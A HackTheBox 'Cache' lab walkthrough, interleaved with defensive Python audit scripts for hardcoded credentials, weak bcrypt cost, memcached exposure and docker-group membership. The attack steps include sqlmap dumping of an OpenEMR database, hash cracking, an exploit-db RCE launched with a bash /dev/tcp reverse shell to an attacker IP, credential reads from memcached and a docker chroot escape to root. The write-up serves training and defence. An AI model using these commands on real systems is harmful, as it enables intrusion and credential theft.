Cache HackTheBox Walkthrough
This is the Cache HackTheBox walkthrough. In this walkthrough I will demonstrate the step-by-step procedure of how I rooted the Cache HackTheBox machine. Cache is a Linux machine with IP address 10.10.10.188 and is given the difficulty level medium by its maker. Let's begin. Connect your machine to the VPN and confirm connectivity by pinging the IP 10.10.10.188.
I started by scanning the IP 10.10.10.188 so that I could get some starting point to proceed. Nmap [a popular port scanner] gave the following result.
Scanning
$nmap -sV -sC -oA scan 10.10.10.188
Nmap revealed that ports 22, 80, and 30000 are open, with SSH, Apache Web Server, and Memcached [a general purpose distributed memory-caching system] services running on them respectively. After going to the URL http://10.10.10.188/author.html I found the name ash. Added it to my notes as it may be a user of the box. Nothing else interesting was found, so I tried directory brute forcing.
Directory brute forcing
$dirsearch -u 10.10.10.188 -e all -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
Directory brute forcing revealed two folders, javascript and jquery.
Access to http://10.10.10.188/javascript/ gives access denied, and http://10.10.10.188/jquery/functionality.js revealed more. From the above file I got the credential ash: H@v3_fun.
Used the credential at the URL http://10.10.10.188/login.html. After login I got nothing interesting except an image of a magician.
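The credential above was recoverable only because the login check lived in a client-side script. The following is an added example (not part of the original post) of the kind of check a defender can run over static assets to catch that pattern before a deployment. The JavaScript sample inside it is constructed to imitate a browser-side login check; it is not the real functionality.js from the box, although it reuses the username and password values reported above. The rule labels and the function names are my own.

```python
import re

# Constructed sample of a client-side script that validates a login in the
# browser. It is NOT the real functionality.js from the box; it only imitates
# the pattern (the two values are the ones reported in the walkthrough).
SAMPLE_JS = """\
$(function(){
    var error_correctPassword = false;
    var error_username = false;
    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != 'H@v3_fun'){
            alert("Password is not correct");
            error_correctPassword = true;
        }
    }
    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "ash"){
            alert("Username is not correct");
            error_username = true;
        }
    }
    var config = { apiKey: "example-key-1234", retries: 3 };
});
"""

# Each rule is (label, regex). Group 1 is the identifier, group 3 the literal.
# Comparing or assigning a credential-like identifier against a string literal
# is the tell-tale of a secret shipped to the browser.
RULES = [
    ("password-literal-compare",
     re.compile(r"""(?i)\b(pass(?:word|wd)?)\b\s*(?:!==|===|!=|==)\s*(['"])([^'"]{4,})\2""")),
    ("username-literal-compare",
     re.compile(r"""(?i)\b(user(?:name)?)\b\s*(?:!==|===|!=|==)\s*(['"])([^'"]{2,})\2""")),
    ("secret-assignment",
     re.compile(r"""(?i)\b(pass(?:word|wd)?|secret|token|api_?key)\b\s*[:=]\s*(['"])([^'"]{4,})\2""")),
]


def find_hardcoded_credentials(js_text):
    """Return [(line_no, rule_label, identifier, literal)] for every hit."""
    findings = []
    for line_no, line in enumerate(js_text.splitlines(), start=1):
        for label, rx in RULES:
            for m in rx.finditer(line):
                findings.append((line_no, label, m.group(1), m.group(3)))
    return findings


def redacted_report(js_text):
    """Report lines with the literal masked, suitable for a ticket or finding."""
    return [
        f"line {n}: {label} on '{ident}' (value {lit[0]}***, {len(lit)} chars)"
        for n, label, ident, lit in find_hardcoded_credentials(js_text)
    ]


if __name__ == "__main__":
    for row in redacted_report(SAMPLE_JS):
        print(row)
```

Run it against the build output (for example every `.js` under the web root) as a pre-deploy gate; the real fix is to move the credential check to the server, because anything in a static asset is readable by every visitor.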
Tried to create custom wordlist using cewl.
Custom Wordlist Create
$cewl -w custom_wordlist.txt -d 10 -m 1 http://10.10.10.188/author.html
Tried WFUZZ for domain names with the custom wordlist we have created.
Fuzzing For domain
$ wfuzz -w custom_wordlist.txt -H "HOST: FUZZ.htb" -u http://10.10.10.188/ --hc 400 --hh 8193
Got a 302 response for the word HMS. Added hms.htb to my /etc/hosts file, in case Virtual Hosting is enabled and we can get something more to enumerate.
Hosts file before modification
Hosts file after modification
On going to http://hms.htb I found that it is running OpenEMR software [a medical practice management software which also supports Electronic Medical Records], and it redirected me to the login page http://hms.htb/interface/login/login.php?site=default. Tried to login with the default credential admin: pass, but could not login.
Tip: During CTF hunting and penetration testing, whenever you come across any popular software or web app, always try to login with the default credentials, because sometimes administrators forget to change them.
As I found a known software, my next step was to find its version so that I could get information about public exploits. After a lot of enumeration I couldn't get its version. At the footer of the login page at http://hms.htb/interface/login/login.php?site=default I saw that the copyright information is outdated. So I am guessing that this software was last updated in 2018, and a public exploit from before 2018 may work on it. After seeing the release history it appears that the current version is 5.0.1 or less than this.
As soon as I get the software name and its version, my next step is to find an available public exploit.
Searching Public Exploit
$searchsploit openemr 5.0.1
Searchsploit shows that there is an authenticated RCE. So we require the username and password of the OpenEMR software to get Remote Code Execution. After some googling I got this file on the OpenEMR website https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf which reveals that OpenEMR 5.0.1 has multiple vulnerabilities, and SQL Injection was among them. According to the pdf file there is a GET-based SQL injection vulnerability at the URL http://hms.htb/portal/add_edit_event_user.php?eid=1. I recommend you read the pdf file to know more.
Dump username and password
Capture the request in a file named request.txt using Burp Suite.
$sqlmap -r request.txt --dbs --batch
$sqlmap -r request.txt -D openemr --tables
$sqlmap -r request.txt -D openemr -T users_secure --dump
Got the credential
openemr_admin : $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.
from the database openemr. After identifying the hash I found that it is a bcrypt hash. Cracked the hash using the Debcrypt tool.
$git clone https://github.com/BREAKTEAM/Debcrypt.git
$cd Debcrypt/
$python3 crack.py
HASH: $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.
So the credential is openemr_admin: xxxxxx [six lowercase x's].
Tip: Always try to use a tool which is designed for a dedicated task rather than a tool which performs many kinds of operations. This will increase efficiency and accuracy. For example, to crack the bcrypt hash I used Debcrypt, a tool made to crack bcrypt hashes, rather than Hashcat or JohnTheRipper.
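One detail worth reading out of the hash itself: its prefix `$2a$05$` means a bcrypt work factor of 5, i.e. only 2^5 = 32 rounds of key setup per guess, against 4096 at the commonly recommended minimum cost of 10 and higher still at 12 or more. A low cost factor, combined with a six-character password, is why the hash fell so quickly. Below is an added example (not from the original post or from OpenEMR) that parses the bcrypt modular-crypt string and flags weak work factors across a dump of user rows; a defender can run the same check against a password table to find accounts whose hashes need to be re-hashed at a higher cost on next login. The hash for openemr_admin is the one shown above; the second row, and all function names, are constructed for illustration.

```python
import re

# bcrypt modular-crypt string: $<variant>$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(
    r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$"
)

# The hash dumped from the users_secure table above.
SAMPLE_HASH = "$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B."

# Constructed rows imitating a users_secure dump; only the first hash is real.
# The second is a synthetic, well-formed cost-12 string (not a real digest).
SAMPLE_ROWS = [
    ("openemr_admin", SAMPLE_HASH),
    ("svc_backup", "$2b$12$" + "A" * 22 + "b" * 31),
]


def parse_bcrypt(h):
    """Split a bcrypt string into variant, cost, rounds (2**cost), salt, digest."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError("not a well-formed bcrypt hash")
    variant, cost, salt, digest = m.groups()
    cost = int(cost)
    return {
        "variant": variant,
        "cost": cost,
        "rounds": 2 ** cost,
        "salt": salt,
        "digest": digest,
    }


def is_weak_cost(h, min_cost=10):
    """True when the work factor is below min_cost (10 is a common floor)."""
    return parse_bcrypt(h)["cost"] < min_cost


def audit_rows(rows, min_cost=10):
    """[(user, cost, weak)] for (user, hash) rows; malformed hashes get cost None."""
    out = []
    for user, h in rows:
        try:
            cost = parse_bcrypt(h)["cost"]
        except ValueError:
            out.append((user, None, True))  # not bcrypt at all: treat as weak
            continue
        out.append((user, cost, cost < min_cost))
    return out


if __name__ == "__main__":
    for user, cost, weak in audit_rows(SAMPLE_ROWS):
        print(f"{user}: cost={cost} {'WEAK' if weak else 'ok'}")
```

Because bcrypt stores the cost in the string, the audit needs no secrets and no cracking: it reads the table and lists what to re-hash.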
Since we already know that an authenticated RCE exploit exists for the OpenEMR software, let's use it by mirroring it to our PC from the exploit-db database.
Mirror exploit
$searchsploit openemr 5.0.1
$searchsploit -m exploits/php/webapps/45161.py
$mv 45161.py openemr_rce.py
Getting Shell
$nc -nvlp 1234
// In separate window
$python openemr_rce.py http://hms.htb -u openemr_admin -p xxxxxx -c '/bin/bash -i >& /dev/tcp/10.10.14.44/1234 0>&1'
Upgrade the shell to a fully interactive Linux shell.
Shell Upgrade
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ export TERM=xterm-256color
Got two users, ash and luffy, inside the /home/ directory. Easily switched to user ash using $su ash. Enter the creds which we captured from the http://10.10.10.188/jquery/functionality.js file, i.e., H@v3_fun.
$su ash
Password: H@v3_fun
Grab User Flag
$cat /home/ash/user.txt
PRIVILEGE ESCALATION
Tried to run $sudo -l to check if ash has any special permissions, but got an error because user ash is not configured in the sudoers file.
linpeas.sh [a post-exploitation enumeration script] revealed that user luffy is part of the docker group.
After googling docker privilege escalation I found a couple of interesting articles. But the problem is that docker can only be run by user luffy, because luffy is part of the docker group, and we can't switch to luffy using $su luffy because we don't have their credentials. So we need the password of luffy. Wait, we have a memcached server running on port 30000.
After googling "Penetration testing on memcached server" I found an article. Followed the steps discussed in the article and got the credentials of luffy. Remember that all these steps need to be done on the remote Cache machine.
$netstat -alnop revealed that the memcached server is listening on port 11211 locally. So we have to connect to it using telnet to get some information.
$telnet 127.0.0.1 11211
~version
~stats
~stats slab
~stats items
~stats cachedump 1 0
~get user
~get passwd
So the credential is luffy: 0n3_p1ec3. Exit from telnet and switch the user to luffy.
$su luffy
Password: 0n3_p1ec3
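Two things went wrong on the defender's side here: memcached answered on the network (nmap saw it on 30000) and the cache held plaintext credentials under obvious key names, readable by anyone who can reach the unauthenticated port. Below is an added example (not from the original post, and not the box's real configuration) that audits both: it parses a Debian-style memcached.conf (one option per line, which is an assumption about the format) and flags a non-loopback bind or UDP left enabled, and it scans a `stats cachedump` listing for credential-like key names. Both config texts and the cachedump output are constructed samples; the key names are chosen to resemble what the telnet session above returned.

```python
import re

# Constructed Debian-style /etc/memcached.conf, one option per line.
# This is NOT the real configuration from the box.
WEAK_CONF = """\
# run as a daemon
-d
logfile /var/log/memcached.log
-m 64
-p 11211
-u memcache
-l 0.0.0.0
"""

HARDENED_CONF = """\
-d
logfile /var/log/memcached.log
-m 64
-p 11211
-u memcache
-l 127.0.0.1
-U 0
"""

# Constructed output of "stats cachedump 1 0", in memcached's ITEM format.
SAMPLE_CACHEDUMP = """\
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
SENSITIVE_KEY = re.compile(r"(?i)(pass|pwd|secret|token|session|apikey|user)")


def parse_memcached_conf(text):
    """Map '-x value' lines to {option: value}; bare flags map to None."""
    opts = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments
        if not line.startswith("-"):
            continue  # 'logfile ...' and blank lines are not options
        parts = line.split(None, 1)
        opts[parts[0]] = parts[1] if len(parts) > 1 else None
    return opts


def audit_memcached_conf(text):
    """Return a list of findings; empty means the bind/UDP checks pass."""
    opts = parse_memcached_conf(text)
    findings = []
    listen = opts.get("-l")
    if listen is None:
        # Without -l memcached binds every interface.
        findings.append("no -l option: memcached binds all interfaces by default")
    else:
        exposed = [a.strip() for a in listen.split(",") if a.strip() not in LOOPBACK]
        if exposed:
            findings.append("listening on non-loopback address(es): " + ", ".join(exposed))
    if opts.get("-U") != "0":
        # Older builds enable UDP on 11211 unless -U 0 is set explicitly.
        findings.append("UDP not explicitly disabled (-U 0)")
    return findings


def sensitive_cache_keys(dump_text):
    """Keys from a cachedump listing whose names suggest stored credentials."""
    keys = re.findall(r"^ITEM (\S+) \[", dump_text, re.M)
    return [k for k in keys if SENSITIVE_KEY.search(k)]


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_memcached_conf(conf) or "OK")
    print("credential-like keys:", sensitive_cache_keys(SAMPLE_CACHEDUMP))
```

Binding to loopback fixes only network exposure; a local user, as in this box, can still read the cache, so the second check matters too: a cache should hold session identifiers or rendered fragments, never a user's password.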
Getting Root
Lastly, run
$docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
to get root.
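Why that one command is enough: `-v /:/mnt` bind-mounts the host's root filesystem into the container, and since the Docker daemon runs as root, `chroot /mnt sh` hands back a root shell on the host. Membership in the docker group is therefore equivalent to root, and the same applies to lxd and to the disk group (raw access to block devices). The added example below (not from the original post; the group and passwd excerpts are constructed, not the box's real files) is the check an administrator can run to list every account that holds such membership, including accounts whose primary group in /etc/passwd is one of these groups, which `cat /etc/group` alone would miss. The mitigation is to remove the membership, or to run the daemon in rootless mode so the socket no longer carries root authority.

```python
# Constructed /etc/group excerpt, not the box's real file.
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:
docker:x:999:luffy
ash:x:1000:
luffy:x:1001:
"""

# Constructed /etc/passwd excerpt, used to pick up primary-group membership.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
ash:x:1000:1000::/home/ash:/bin/bash
luffy:x:1001:1001::/home/luffy:/bin/bash
"""

# Groups whose membership amounts to root, with the reason for the report.
ROOT_EQUIVALENT = {
    "docker": "can bind-mount / into a container and chroot into it as root",
    "lxd": "can launch a privileged container with the host filesystem mounted",
    "disk": "can read and write raw block devices, bypassing file permissions",
}


def parse_group(text):
    """{name: {'gid': int, 'members': [..]}} from /etc/group lines."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":")
        groups[name] = {"gid": int(gid), "members": [m for m in members.split(",") if m]}
    return groups


def parse_passwd(text):
    """{user: primary_gid} from /etc/passwd lines."""
    users = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        users[fields[0]] = int(fields[3])
    return users


def root_equivalent_members(group_text, passwd_text):
    """[(user, group, reason)] for every account in a root-equivalent group."""
    groups = parse_group(group_text)
    primary_gid = parse_passwd(passwd_text)
    findings = []
    for gname, reason in ROOT_EQUIVALENT.items():
        g = groups.get(gname)
        if g is None:
            continue  # group not present on this host
        members = set(g["members"])
        # Supplementary membership lives in /etc/group; primary membership
        # is only visible through the gid column of /etc/passwd.
        members |= {u for u, gid in primary_gid.items() if gid == g["gid"]}
        for user in sorted(members):
            findings.append((user, gname, reason))
    return findings


if __name__ == "__main__":
    for user, group, reason in root_equivalent_members(SAMPLE_GROUP, SAMPLE_PASSWD):
        print(f"{user} is in '{group}': {reason}")
```

On a live host read the two files from /etc and feed their contents to `root_equivalent_members`; every line it prints is an account that should be treated, and protected, as an administrator.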
Capture Root Flag
$cat /root/root.txt
This is how I rooted the Cache machine. I learnt a lot during this challenge. Hope you guys have also learnt some new things. If you have any issue, feel free to comment. Want to give a suggestion? Please write to us at [email protected]. Check out my latest walkthroughs at https://ethicalhacs.com